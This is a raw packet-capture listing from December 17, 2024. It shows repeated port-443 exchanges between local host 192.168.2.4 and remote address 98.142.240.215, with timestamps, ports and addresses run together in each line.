                                                                                                                                                                              Dec 17, 2024 18:12:29.314769030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.314795971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.314850092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.317625046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.317692995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.317714930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.317770004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.437215090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.437297106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.437319040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.437365055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.440445900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.440514088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.440521002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.440566063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.443268061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.443336964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.443342924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.443389893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.447334051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.447397947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.447405100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.447444916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.450377941 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.450448990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.450454950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.450495005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.453334093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.453397036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.453402996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.453445911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.457175970 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.457241058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.457247019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.457288027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.460403919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.460522890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.460527897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.460566998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.464232922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.464301109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.464307070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.464345932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.467250109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.467319965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.467324972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.467365026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.470818043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.470886946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.470892906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.470937014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.474149942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.474236012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.474242926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.474298954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.477096081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.477158070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.477164984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.477201939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.481062889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.481128931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.481134892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.481178045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.508181095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.508246899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.508259058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.508305073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.511709929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.511768103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.511775017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.511816025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.656140089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.656251907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.656286955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.656347036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.659425974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.659492970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.659507990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.659547091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.663234949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.663305998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.663331985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.663400888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.666362047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.666552067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.666583061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.666635990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.669523001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.669598103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.669605017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.669647932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.673325062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.673393011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.673404932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.673453093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.676446915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.676541090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.676556110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.676601887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.679663897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.679738045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.679744959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.679790974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.683562994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.683636904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.683645010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.683691978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.686750889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.686845064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.686851978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.686892986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.689979076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.690057993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.690063953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.690109015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.694107056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.694206953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.694211960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.694263935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.697361946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.697458982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.697465897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.697508097 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.700577974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.700678110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.700684071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.700730085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.743891001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.744018078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.744050026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.744187117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.747596979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.747692108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.747704029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.747745037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.855884075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.856214046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.856236935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.856404066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.859601974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.859674931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.859685898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.859729052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.862848043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.862907887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.862917900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.862957954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.865871906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.865933895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.865942955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.865983963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.869833946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.869913101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.869920969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.869962931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.872909069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.872968912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.872977972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.873018980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.876768112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.876852036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.876857042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.876895905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.879779100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.879846096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.879852057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.879894018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.883192062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.883276939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.883281946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.883333921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.887137890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.887202978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.887207985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.887258053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.890002012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.890099049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.890104055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.890146017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.893052101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.893117905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.893124104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.893162966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.896595001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.896675110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.896681070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.896723986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.900511980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.900580883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.900587082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.900629997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.936450958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.936531067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.936563015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.936613083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.940119028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.940207005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:29.940227032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:29.940269947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.048491955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.048795938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.048821926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.048878908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.051249027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.051342010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.051347971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.051393032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.055417061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.055562973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.055568933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.055620909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.058314085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.058397055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.058402061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.058445930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.062186003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.062298059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.062304974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.062357903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.065253973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.065329075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.065335035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.065378904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.068456888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.068517923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.068525076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.068566084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.072273016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.072360039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.072365999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.072407961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.075333118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.075402021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.075407982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.075452089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.078552961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.078619957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.078625917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.078664064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.082290888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.082382917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.082387924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.082427979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.085824966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.085896015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.085901022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.085943937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.088927031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.088999987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.089005947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.089050055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.092294931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.092396021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.092401028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.092444897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.129224062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.129339933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.129374027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.129422903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.133060932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.133332968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.133337975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.133383989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.241439104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.241542101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.241575003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.241645098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.245229959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.245301008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.245307922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.245348930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.248714924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.248785973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.248791933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.248852015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.253232956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.253304005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.253310919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.253370047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.256541014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.256604910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.256612062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.256650925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.260092974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.260166883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.260181904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.260234118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.263509035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.263598919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.263609886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.263655901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.266350031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.266416073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.266422987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.266462088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:30.269129038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:30.269193888 CET49731443192.168.2.498.142.240.215
